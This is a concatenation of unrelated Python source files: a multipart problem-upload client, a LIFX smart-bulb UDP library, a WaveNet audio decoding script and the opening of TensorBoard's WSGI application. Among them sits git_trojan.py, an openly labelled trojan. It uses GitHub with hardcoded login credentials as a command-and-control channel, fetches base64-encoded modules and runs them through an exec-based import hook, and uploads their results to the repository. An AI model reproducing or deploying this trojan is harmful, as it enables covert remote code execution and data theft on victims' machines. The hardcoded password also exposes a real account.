def _digest(data):
# data: bytes => md5(data): bytes
return hashlib.md5(data).digest()
@staticmethod
def _checksum_b64(digest):
# digest: bytes => base64(digest): str
return base64.b64encode(digest).decode('ascii')
@staticmethod
def _checksum_hex(digest):
# digest: bytes => hex(digest): str
return codecs.encode(digest, 'hex').decode('ascii')
@staticmethod
def _combined_checksum(checksums):
# TODO: drop this requirement server-side
# checksums: Dict[int, str] => hex(md5(cat(digests))): str
combined = ''.join(h for _, h in sorted(checksums.items()))
digest = codecs.decode(combined, 'hex')
return Client._checksum_hex(Client._digest(digest))
@staticmethod
@retried(_UPLOAD_PART_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _upload_multipart_part(session, problem_id, part_id, part_stream,
uploaded_part_checksum=None):
"""Upload one problem part. Sync http request.
Args:
session (:class:`requests.Session`):
Session used for all API requests.
problem_id (str):
Problem id.
part_id (int):
Part number/id.
part_stream (:class:`io.BufferedIOBase`/binary-stream-like):
Problem part data container that supports `read` operation.
uploaded_part_checksum (str/None):
Checksum of previously uploaded part. Optional, but if specified
checksum is verified, and part is uploaded only if checksums
don't match.
Returns:
Hex digest of part data MD5 checksum.
"""
logger.debug("Uploading part_id=%r of problem_id=%r", part_id, problem_id)
# TODO: work-around to get a checksum of a binary stream (avoid 2x read)
data = part_stream.read()
digest = Client._digest(data)
b64digest = Client._checksum_b64(digest)
hexdigest = Client._checksum_hex(digest)
del data
if uploaded_part_checksum is not None:
if hexdigest == uploaded_part_checksum:
logger.debug("Uploaded part checksum matches. "
"Skipping upload for part_id=%r.", part_id)
return hexdigest
else:
logger.debug("Uploaded part checksum does not match. "
"Re-uploading part_id=%r.", part_id)
# rewind the stream after read
part_stream.seek(0)
path = 'bqm/multipart/{problem_id}/part/{part_id}'.format(
problem_id=problem_id, part_id=part_id)
headers = {
'Content-MD5': b64digest,
'Content-Type': 'application/octet-stream',
}
logger.trace("session.put(path=%r, data=%r, headers=%r)",
path, part_stream, headers)
try:
response = session.put(path, data=part_stream, headers=headers)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
else:
logger.trace("Part upload response: %r", response.text)
response.raise_for_status()
logger.debug("Uploaded part_id=%r of problem_id=%r", part_id, problem_id)
return hexdigest
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _get_multipart_upload_status(session, problem_id):
logger.debug("Checking upload status of problem_id=%r", problem_id)
path = 'bqm/multipart/{problem_id}/status'.format(problem_id=problem_id)
logger.trace("session.get(path=%r)", path)
try:
response = session.get(path)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
else:
logger.trace("Upload status response: %r", response.text)
response.raise_for_status()
try:
problem_status = response.json()
problem_status['status']
problem_status['parts']
except KeyError:
raise InvalidAPIResponseError("'status' and/or 'parts' missing")
logger.debug("Got upload status=%r for problem_id=%r",
problem_status['status'], problem_id)
return problem_status
@staticmethod
def _failsafe_get_multipart_upload_status(session, problem_id):
try:
return Client._get_multipart_upload_status(session, problem_id)
except Exception as e:
logger.debug("Upload status check failed with %r", e)
return {"status": "UNDEFINED", "parts": []}
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _combine_uploaded_parts(session, problem_id, checksum):
logger.debug("Combining uploaded parts of problem_id=%r", problem_id)
path = 'bqm/multipart/{problem_id}/combine'.format(problem_id=problem_id)
body = dict(checksum=checksum)
logger.trace("session.post(path=%r, json=%r)", path, body)
try:
response = session.post(path, json=body)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
else:
logger.trace("Combine parts response: %r", response.text)
response.raise_for_status()
logger.debug("Issued a combine command for problem_id=%r", problem_id)
@staticmethod
def _uploaded_parts_from_problem_status(problem_status):
uploaded_parts = {}
if problem_status.get('status') == 'UPLOAD_IN_PROGRESS':
for part in problem_status.get('parts', ()):
part_no = part.get('part_number')
checksum = part.get('checksum', '').strip('"') # fix double-quoting bug
uploaded_parts[part_no] = checksum
return uploaded_parts
def _upload_part_worker(self, problem_id, part_no, chunk_stream,
uploaded_part_checksum=None):
with self.create_session() as session:
part_checksum = self._upload_multipart_part(
session, problem_id, part_id=part_no, part_stream=chunk_stream,
uploaded_part_checksum=uploaded_part_checksum)
return part_no, part_checksum
def _upload_problem_worker(self, problem, problem_id=None):
"""Upload a problem to SAPI using multipart upload interface.
Args:
problem (bytes/str/file-like):
Problem description.
problem_id (str, optional):
Problem ID under which to upload the problem. If omitted, a new
problem is created.
"""
# in python 3.7+ we could create the session once, on thread init,
# via executor initializer
with self.create_session() as session:
chunks = ChunkedData(problem, chunk_size=self._UPLOAD_PART_SIZE_BYTES)
size = len(chunks.view)
if problem_id is None:
try:
problem_id = self._initiate_multipart_upload(session, size)
except Exception as e:
errmsg = ("Multipart upload initialization failed "
"with {!r}.".format(e))
logger.error(errmsg)
raise ProblemUploadError(errmsg)
# check problem status, so we only upload parts missing or invalid
problem_status = \
self._failsafe_get_multipart_upload_status(session, problem_id)
if problem_status.get('status') == 'UPLOAD_COMPLETED':
logger.debug("Problem already uploaded.")
return problem_id
uploaded_parts = \
self._uploaded_parts_from_problem_status(problem_status)
# enqueue all parts, worker skips if checksum matches
parts = {}
streams = collections.OrderedDict(enumerate(chunks))
for chunk_no, chunk_stream in streams.items():
part_no = chunk_no + 1
part_future = self._upload_part_executor.submit(
self._upload_part_worker,
problem_id, part_no, chunk_stream,
uploaded_part_checksum=uploaded_parts.get(part_no))
parts[part_no] = part_future
# wait for parts to upload/fail
concurrent.futures.wait(parts.values())
# verify all parts uploaded without error
for part_no, part_future in parts.items():
try:
part_future.result()
except Exception as e:
errmsg = ("Multipart upload of problem_id={!r} failed for "
"part_no={!r} with {!r}.".format(problem_id, part_no, e))
logger.error(errmsg)
raise ProblemUploadError(errmsg)
# verify all parts uploaded via status call
# (check remote checksum matches the local one)
final_problem_status = \
self._failsafe_get_multipart_upload_status(session, problem_id)
final_uploaded_parts = \
self._uploaded_parts_from_problem_status(final_problem_status)
if len(final_uploaded_parts) != len(parts):
errmsg = "Multipart upload unexpectedly failed for some parts."
logger.error(errmsg)
logger.debug("problem_id=%r, expected_parts=%r, uploaded_parts=%r",
problem_id, parts.keys(), final_uploaded_parts.keys())
raise ProblemUploadError(errmsg)
for part_no, part_future in parts.items():
_, part_checksum = part_future.result()
remote_checksum = final_uploaded_parts[part_no]
if part_checksum != remote_checksum:
errmsg = ("Checksum mismatch for part_no={!r} "
"(local {!r} != remote {!r})".format(
part_no, part_checksum, remote_checksum))
logger.error(errmsg)
raise ProblemUploadError(errmsg)
# send parts combine request
combine_checksum = Client._combined_checksum(final_uploaded_parts)
try:
self._combine_uploaded_parts(session, problem_id, combine_checksum)
except Exception as e:
errmsg = ("Multipart upload of problem_id={!r} failed on parts "
"combine with {!r}".format(problem_id, e))
logger.error(errmsg)
raise ProblemUploadError(errmsg)
return problem_id
|
liffylights.py | '''
liffylights by TangoAlpha - LIFX Python library
https://github.com/TangoAlpha/liffylights
Published under the MIT license - See LICENSE file for more details.
Not associated with or endorsed by LiFi Labs, Inc. (http://www.lifx.com/)
'''
# pylint: disable=missing-docstring
import threading
import time
import queue
import socket
import io
import ipaddress
import struct
from struct import pack
from enum import IntEnum
UDP_PORT = 56700 # UDP port for listening socket
BUFFERSIZE = 1024 # socket buffer size
SHORT_MAX = 65535 # short int maximum
BYTE_MAX = 255 # byte value maximum
ACK_RESEND = 0.5 # resend packets every n seconds
ACK_TIMEOUT = 5 # seconds before giving up on packet
SEQUENCE_BASE = 1 # packet sequence base (0 is for bulb sends)
SEQUENCE_COUNT = 255 # packet sequence count
HUE_MIN = 0 # LIFX hue minimum value
HUE_MAX = 65535 # LIFX hue maximum value
SATURATION_MIN = 0 # LIFX saturation minimum value
SATURATION_MAX = 65535 # LIFX saturation maximum value
BRIGHTNESS_MIN = 0 # LIFX brightness minimum value
BRIGHTNESS_MAX = 65535 # LIFX brightness maximum value
TEMP_MIN = 2500 # LIFX temperature minimum value
TEMP_MAX = 9000 # LIFX temperature maximum value
class PayloadType(IntEnum):
""" Message payload types. """
GETSERVICE = 2
STATESERVICE = 3
GETHOSTINFO = 12
STATEHOSTINFO = 13
GETHOSTFIRMWARE = 14
STATEHOSTFIRMWARE = 15
GETWIFIINFO = 16
STATEWIFIINFO = 17
GETWIFIFIRMWARE = 18
STATEWIFIFIRMWARE = 19
GETPOWER1 = 20
SETPOWER1 = 21
STATEPOWER1 = 22
GETLABEL = 23
SETLABEL = 24
STATELABEL = 25
GETVERSION = 32
STATEVERSION = 33
GETINFO = 34
STATEINFO = 35
ACKNOWLEDGEMENT = 45
GETLOCATION = 48
STATELOCATION = 50
GETGROUP = 51
STATEGROUP = 53
ECHOREQUEST = 58
ECHORESPONSE = 59
GET = 101
SETCOLOR = 102
STATE = 107
GETPOWER2 = 116
SETPOWER2 = 117
STATEPOWER2 = 118
class Power(IntEnum):
""" Power settings. """
BULB_ON = 65535
BULB_OFF = 0
class LiffyLights():
""" Provides liffylights API class. """
def __init__(self, device_callback, power_callback, color_callback,
server_addr=None, broadcast_addr=None):
self._device_callback = device_callback
self._power_callback = power_callback
self._color_callback = color_callback
self._packet_lock = threading.Lock()
self._packets = []
self._queue = queue.Queue(maxsize=255)
# if no address given, bind to 0.0.0.0
if server_addr is None:
listener_addr = "0.0.0.0"
else:
listener_addr = server_addr
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._sock.bind((listener_addr, UDP_PORT))
self._listener = threading.Thread(target=self._packet_listener)
self._listener.daemon = True
self._listener.start()
self._manager = threading.Thread(target=self._packet_manager)
self._manager.daemon = True
self._manager.start()
self._sender = threading.Thread(target=self._command_sender)
self._sender.daemon = True
self._sender.start()
if server_addr is None:
# use socket address to check for broadcast packets
self._server_addr = socket.gethostbyname(socket.getfqdn())
else:
self._server_addr = server_addr
if broadcast_addr is None:
# make best guess for broadcast address
addr = ipaddress.ip_interface(self._server_addr + "/24")
self._broadcast_addr = str(addr.network.broadcast_address)
else:
self._broadcast_addr = broadcast_addr
def _gen_header(self, sequence, payloadtype):
""" Create packet header. """
protocol = bytearray.fromhex("00 34")
source = bytearray.fromhex("42 52 4b 52")
target = bytearray.fromhex("00 00 00 00 00 00 00 00")
reserved1 = bytearray.fromhex("00 00 00 00 00 00")
sequence = pack("<B", sequence)
ack = pack(">B", 3)
reserved2 = bytearray.fromhex("00 00 00 00 00 00 00 00")
packet_type = pack("<H", payloadtype)
reserved3 = bytearray.fromhex("00 00")
# assemble header
header = bytearray(protocol)
header.extend(source)
header.extend(target)
header.extend(reserved1)
header.extend(ack)
header.extend(sequence)
header.extend(reserved2)
header.extend(packet_type)
header.extend(reserved3)
return header
def _gen_packet(self, sequence, payloadtype, payload=None):
""" Generate packet header. """
contents = self._gen_header(sequence, payloadtype)
# add payload
if payload:
contents.extend(payload)
# get packet size
size = pack("<H", len(contents) + 2)
# assemble complete packet
packet = bytearray(size)
packet.extend(contents)
return packet
def _gen_packet_setcolor(self, sequence, hue, sat, bri, kel, fade):
""" Generate "setcolor" packet payload. """
hue = min(max(hue, HUE_MIN), HUE_MAX)
sat = min(max(sat, SATURATION_MIN), SATURATION_MAX)
bri = min(max(bri, BRIGHTNESS_MIN), BRIGHTNESS_MAX)
kel = min(max(kel, TEMP_MIN), TEMP_MAX)
reserved1 = pack("<B", 0)
hue = pack("<H", hue)
saturation = pack("<H", sat)
brightness = pack("<H", bri)
kelvin = pack("<H", kel)
duration = pack("<I", fade)
# assemble payload
payload = bytearray(reserved1)
payload.extend(hue)
payload.extend(saturation)
payload.extend(brightness)
payload.extend(kelvin)
payload.extend(duration)
return self._gen_packet(sequence, PayloadType.SETCOLOR, payload)
def _gen_packet_get(self, sequence):
""" Generate "get" packet payload. """
# generate payload for Get message
return self._gen_packet(sequence, PayloadType.GET)
def _gen_packet_setpower(self, sequence, power, fade):
""" Generate "setpower" packet payload. """
level = pack("<H", Power.BULB_OFF if power == 0 else Power.BULB_ON)
duration = pack("<I", fade)
# assemble payload
payload = bytearray(level)
payload.extend(duration)
return self._gen_packet(sequence, PayloadType.SETPOWER2, payload)
def _packet_ack(self, packet, sequence):
""" Check packet for ack. """
if packet["sequence"] == sequence:
if packet["payloadtype"] == PayloadType.SETCOLOR:
# notify about colour change
self._color_callback(packet["target"],
packet["hue"],
packet["sat"],
packet["bri"],
packet["kel"])
elif packet["payloadtype"] == PayloadType.SETPOWER2:
# notify about power change
self._power_callback(packet["target"],
packet["power"])
return False
return True
def _process_packet(self, sequence):
""" Check packet list for acks. """
if self._packets:
with self._packet_lock:
self._packets[:] = [packet for packet in self._packets
if self._packet_ack(packet, sequence)]
def _packet_timeout(self, packet, now):
""" Check packet for timeout. """
if now >= packet["timeout"]:
# timed out
return False
if now >= packet["resend"]:
# resend command
self._send_command(packet)
return False
# keep packet
return True
def _packet_manager(self):
""" Watch packet list for timeouts. """
while True:
if self._packets:
with self._packet_lock:
now = time.time()
self._packets[:] = \
[packet for packet in self._packets
if self._packet_timeout(packet, now)]
# c.f. nyquist
time.sleep(ACK_RESEND / 2)
# pylint: disable=too-many-locals,too-many-statements,too-many-branches
def _packet_listener(self):
""" Packet listener. """
while True:
datastream, source = self._sock.recvfrom(BUFFERSIZE)
ipaddr, port = source
# mitigate against invalid packets
try:
sio = io.BytesIO(datastream)
dummy1, sec_part = struct.unpack("<HH",
sio.read(4))
protocol = sec_part % 4096
if protocol == 1024:
source, dummy1, dummy2, dummy3, sequence, dummy4, \
payloadtype, dummy5 = struct.unpack("<IQ6sBBQHH",
sio.read(32))
if ipaddr == self._server_addr:
# ignore any broadcast packets
pass
elif payloadtype == PayloadType.ACKNOWLEDGEMENT:
self._process_packet(sequence)
#elif payloadtype == PayloadType.STATESERVICE:
# serv, port = struct.unpack("<BI",
# sio.read(5))
#elif payloadtype == PayloadType.STATEHOSTINFO:
# sig, _tx, _rx, res = struct.unpack("<fIIh",
# sio.read(14))
#elif payloadtype == PayloadType.STATEHOSTFIRMWARE:
# build, res, ver = struct.unpack("<QQI",
# sio.read(20))
#elif payloadtype == PayloadType.STATEWIFIINFO:
# sig, _tx, _rx, res = struct.unpack("<fIIh",
# sio.read(14))
#elif payloadtype == PayloadType.STATEWIFIFIRMWARE:
# build, _reserved, ver = struct.unpack("<QQI",
# sio.read(20))
#elif payloadtype == PayloadType.STATEPOWER1:
# level, = struct.unpack("<H",
# sio.read(2))
#elif payloadtype == PayloadType.STATELABEL:
# label, = struct.unpack("<32s",
# sio.read(32))
#elif payloadtype == PayloadType.STATEVERSION:
# ven, prod, ver = struct.unpack("<HHH",
# sio.read(6))
#elif payloadtype == PayloadType.STATEINFO:
# _tm, uptm, dwntm = struct.unpack("<QQQ",
# sio.read(24))
#elif payloadtype == PayloadType.STATELOCATION:
# loc, label, upd = struct.unpack("<10s32sQ",
# sio.read(50))
#elif payloadtype == PayloadType.STATEGROUP:
# grp, label, upd = struct.unpack("<16s32sQ",
# sio.read(56))
#elif payloadtype == PayloadType.ECHORESPONSE:
# dummy1, = struct.unpack("<64s",
# sio.read(64))
elif payloadtype == PayloadType.STATE:
hue, sat, bri, kel, dummy1, power, label, dummy2 = \
struct.unpack("<HHHHhH32sQ",
sio.read(52))
name = label.decode('ascii')
name = name.replace('\x00', '')
# notify about device
self._device_callback(ipaddr, name, power, hue,
sat, bri, kel)
#elif payloadtype == PayloadType.STATEPOWER2:
# level, = struct.unpack("<H",
# sio.read(2))
# pylint: disable=broad-except
except Exception:
pass
def _send_command(self, cmd):
""" Add to command queue. """
self._queue.put(cmd)
def _command_sender(self):
""" Command sender. """
sequence = -1
while True:
cmd = self._queue.get()
ipaddr = cmd["target"]
payloadtype = cmd["payloadtype"]
if "sequence" not in cmd:
# get next sequence number if we haven't got one
sequence = (sequence + 1) % SEQUENCE_COUNT
cmd["sequence"] = sequence + SEQUENCE_BASE
packet = None
if payloadtype == PayloadType.SETCOLOR:
packet = self._gen_packet_setcolor(cmd["sequence"],
cmd["hue"],
cmd["sat"],
cmd["bri"],
cmd["kel"],
cmd["fade"])
elif payloadtype == PayloadType.SETPOWER2:
packet = self._gen_packet_setpower(cmd["sequence"],
cmd["power"],
cmd["fade"])
elif payloadtype == PayloadType.GET:
packet = self._gen_packet_get(cmd["sequence"])
if packet is not None:
try:
self._sock.sendto(packet, (ipaddr, UDP_PORT))
now = time.time()
# set timeout
if "timeout" not in cmd:
cmd["timeout"] = now + ACK_TIMEOUT
# set earliest resend time
cmd["resend"] = now + ACK_RESEND
with self._packet_lock:
self._packets.append(cmd)
# pylint: disable=broad-except
except Exception:
pass
def probe(self, ipaddr=None):
""" Probe given address for bulb. """
if ipaddr is None:
# no address so use broadcast
ipaddr = self._broadcast_addr
cmd = {"payloadtype": PayloadType.GET,
"target": ipaddr}
self._send_command(cmd)
def set_power(self, ipaddr, power, fade):
""" Send SETPOWER message. """
cmd = {"payloadtype": PayloadType.SETPOWER2,
"target": ipaddr,
"power": power,
"fade": fade}
self._send_command(cmd)
def set_color(self, ipaddr, hue, sat, bri, kel, fade):
""" Send SETCOLOR message. """
cmd = {"payloadtype": PayloadType.SETCOLOR,
"target": ipaddr,
"hue": hue,
"sat": sat,
"bri": bri,
"kel": kel,
"fade": fade}
self._send_command(cmd)
|
git_trojan.py | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules= []
task_queue = Queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self,fullname,path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self,name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def connect_to_github():
gh = login(username="gclegane",password="%Husokatzenkatertier")
repo = gh.repository("gclegane","chapter7")
branch = repo.branch("master")
return gh,repo,branch
def get_file_contents(filepath):
gh,repo,branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh,repo,branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000))
repo.create_file(remote_path,"Commit message",base64.b64encode(data))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner,args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
time.sleep(random.randint(1000,10000))
|
decode.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
import argparse
import logging
import math
import os
import sys
import numpy as np
from sklearn.preprocessing import StandardScaler
import soundfile as sf
import torch
from torch.autograd import Variable
import torch.multiprocessing as mp
from torchvision import transforms
from utils import find_files
from utils import read_hdf5
from utils import read_txt
from utils import shape_hdf5
from wavenet import decode_mu_law
from wavenet import encode_mu_law
from wavenet import WaveNet
def pad_list(batch_list, pad_value=0.0):
"""FUNCTION TO PAD VALUE
Args:
batch_list (list): list of batch, where the shape of i-th batch (T_i, C)
pad_value (float): value to pad
Return:
(ndarray): padded batch with the shape (B, T_max, C)
"""
batch_size = len(batch_list)
maxlen = max([batch.shape[0] for batch in batch_list])
n_feats = batch_list[0].shape[-1]
batch_pad = np.zeros((batch_size, maxlen, n_feats))
for idx, batch in enumerate(batch_list):
batch_pad[idx, :batch.shape[0]] = batch
return batch_pad
def decode_generator(feat_list, batch_size=32,
wav_transform=None, feat_transform=None,
use_speaker_code=False, upsampling_factor=0):
"""DECODE BATCH GENERATOR
Args:
featdir (str): directory including feat files
batch_size (int): batch size in decoding
wav_transform (func): preprocessing function for waveform
feat_transform (func): preprocessing function for aux feats
use_speaker_code (bool): whether to use speaker code
upsampling_factor (int): upsampling factor
Return:
(object): generator instance
"""
# for sample-by-sample generation
if batch_size == 1:
for featfile in feat_list:
x = np.zeros((1))
if upsampling_factor == 0:
h = read_hdf5(featfile, "/feat")
else:
h = read_hdf5(featfile, "/feat_org")
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# convert to torch variable
x = Variable(torch.from_numpy(x).long(), volatile=True)
h = Variable(torch.from_numpy(h).float(), volatile=True)
if torch.cuda.is_available():
x = x.cuda()
h = h.cuda()
x = x.unsqueeze(0) # 1 => 1 x 1
h = h.transpose(0, 1).unsqueeze(0) # T x C => 1 x C x T
# get target length and file id
if upsampling_factor == 0:
n_samples = h.size(2) - 1
else:
n_samples = h.size(2) * upsampling_factor - 1
feat_id = os.path.basename(featfile).replace(".h5", "")
yield feat_id, (x, h, n_samples)
# for batch generation
else:
# sort with the feature length
if upsampling_factor == 0:
shape_list = [shape_hdf5(f, "/feat")[0] for f in feat_list]
else:
shape_list = [shape_hdf5(f, "/feat_org")[0] for f in feat_list]
idx = np.argsort(shape_list)
feat_list = [feat_list[i] for i in idx]
# divide into batch list
n_batch = math.ceil(len(feat_list) / batch_size)
batch_lists = np.array_split(feat_list, n_batch)
batch_lists = [f.tolist() for f in batch_lists]
for batch_list in batch_lists:
batch_x = []
batch_h = []
n_samples_list = []
feat_ids = []
for featfile in batch_list:
# make seed waveform and load aux feature
x = np.zeros((1))
if upsampling_factor == 0:
h = read_hdf5(featfile, "/feat")
else:
h = read_hdf5(featfile, "/feat_org")
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# append to list
batch_x += [x]
batch_h += [h]
if upsampling_factor == 0:
n_samples_list += [h.shape[0] - 1]
else:
n_samples_list += [h.shape[0] * upsampling_factor - 1]
feat_ids += [os.path.basename(featfile).replace(".h5", "")]
# convert list to ndarray
batch_x = np.stack(batch_x, axis=0)
batch_h = pad_list(batch_h)
# convert to torch variable
batch_x = Variable(torch.from_numpy(batch_x).long(), volatile=True)
batch_h = Variable(torch.from_numpy(batch_h).float(), volatile=True).transpose(1, 2)
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
yield feat_ids, (batch_x, batch_h, n_samples_list)
def main():
parser = argparse.ArgumentParser()
# decode setting
parser.add_argument("--feats", required=True,
type=str, help="list or directory of aux feat files")
parser.add_argument("--stats", required=True,
type=str, help="hdf5 file including statistics")
parser.add_argument("--checkpoint", required=True,
type=str, help="model file")
parser.add_argument("--config", required=True,
type=str, help="configure file")
parser.add_argument("--outdir", required=True,
type=str, help="directory to save generated samples")
parser.add_argument("--fs", default=16000,
type=int, help="sampling rate")
parser.add_argument("--batch_size", default=32,
type=int, help="number of batch size in decoding")
parser.add_argument("--n_gpus", default=1,
type=int, help="number of gpus")
# other setting
parser.add_argument("--intervals", default=1000,
type=int, help="log interval")
parser.add_argument("--seed", default=1,
type=int, help="seed number")
parser.add_argument("--verbose", default=1,
type=int, help="log level")
args = parser.parse_args()
# check directory existence
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# set log level
if args.verbose > 0:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.outdir + "/decode.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.outdir + "/decode.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.outdir + "/decode.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# load config
config = torch.load(args.config)
# get file list
if os.path.isdir(args.feats):
feat_list = sorted(find_files(args.feats, "*.h5"))
elif os.path.isfile(args.feats):
feat_list = read_txt(args.feats)
else:
logging.error("--feats should be directory or list.")
sys.exit(1)
# prepare the file list for parallel decoding
feat_lists = np.array_split(feat_list, args.n_gpus)
feat_lists = [f_list.tolist() for f_list in feat_lists]
# define transform
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/mean")
scaler.scale_ = read_hdf5(args.stats, "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, config.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
# define gpu decode function
def gpu_decode(feat_list, gpu):
with torch.cuda.device(gpu):
# define model and load parameters
model = WaveNet(
n_quantize=config.n_quantize,
n_aux=config.n_aux,
n_resch=config.n_resch,
n_skipch=config.n_skipch,
dilation_depth=config.dilation_depth,
dilation_repeat=config.dilation_repeat,
kernel_size=config.kernel_size,
upsampling_factor=config.upsampling_factor)
model.load_state_dict(torch.load(args.checkpoint)["model"])
model.eval()
model.cuda()
torch.backends.cudnn.benchmark = True
# define generator
generator = decode_generator(
feat_list,
batch_size=args.batch_size,
wav_transform=wav_transform,
feat_transform=feat_transform,
use_speaker_code=config.use_speaker_code,
upsampling_factor=config.upsampling_factor)
# decode
if args.batch_size > 1:
for feat_ids, (batch_x, batch_h, n_samples_list) in generator:
logging.info("decoding start")
samples_list = model.batch_fast_generate(
batch_x, batch_h, n_samples_list, args.intervals)
for feat_id, samples in zip(feat_ids, samples_list):
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
else:
for feat_id, (x, h, n_samples) in generator:
logging.info("decoding %s (length = %d)" % (feat_id, n_samples))
samples = model.fast_generate(x, h, n_samples, args.intervals)
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
# parallel decode
processes = []
gpu = 0
for i, feat_list in enumerate(feat_lists):
p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
p.start()
processes.append(p)
gpu += 1
if (i + 1) % args.n_gpus == 0:
gpu = 0
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
application.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
from tensorflow.tensorboard.plugins.text import text_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
